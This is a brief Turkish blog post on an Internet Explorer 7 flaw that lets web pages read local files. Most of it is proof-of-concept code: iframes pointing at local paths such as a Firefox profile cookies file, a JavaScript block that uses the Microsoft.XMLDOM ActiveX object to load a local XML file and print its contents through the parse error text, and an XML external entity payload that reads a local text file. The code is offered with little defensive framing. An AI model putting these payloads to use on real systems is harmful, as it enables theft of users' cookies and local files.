IE 7′de tespit edilen güvenlik açığına göre sistemde kayıtlı olan dosyalara erişim sağlanabiliyor.Web sitelerine yerleştiren iframeler ile bu tür saldırıları gerçekleştirmek mümkün oluyor.

 

 

<iframe id=”local3″ src=”file://localhost/FirefoxPortable/Data/profile/cookies.txt”></iframe>

<iframe id=”local4″ src=”file://localhost/test.txt”></iframe>

 

Javascript dosyası:

 

<script language=”JavaScript”>

// load new XML document.

var xmlDoc = new ActiveXObject(”Microsoft.XMLDOM”);

function XML(file,list) {

/*

Available error messages:

————————

:: parseError.errorCode

:: parseError.reason

:: parseError.line

:: parseError.linePos

:: parseError.srcText

————————

*/

xmlDoc.async=”false”;

xmlDoc.validateOnParse = “true”;

xmlDoc.onreadystatechange=chk;

xmlDoc.load(file);

if(list) {

listXML(xmlDoc.documentElement)

} else {

d o c u m e n t.write(xmlDoc.parseError.srcText);

}

}

function chk() {

return (xmlDoc.readyState!=4) ? false:true;

}

function listXML(xmlsrc) {

// for valid DTD files, list the complete tree

if(xmlsrc.hasChildNodes()) {

d o c u m e n t.write(’<ul><li>’);

d o c u m e n t.write(xmlsrc.tagName +’ => ‘);

for(i = 0; i < xmlsrc.childNodes.length; ++i) {

// recursive walk

listXML(xmlsrc.childNodes(i));

}

d o c u m e n t.write(’</li></ul>’);

} else {

d o c u m e n t.write(xmlsrc.text);

}

}

XML(”MSIE7.xml”);

</script>

 

XML ile de gerçekleştiriliyor.


<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes” ?>

<!DOCTYPE show [

<!ENTITY % name SYSTEM “file://localhost/FirefoxPortable/Data/profile/kf.txt”>

%name;

]>

<show>

%name;

</show>
Digg It!DZone It!StumbleUponTechnoratiRedditDel.icio.usNewsVineFurlBlinkList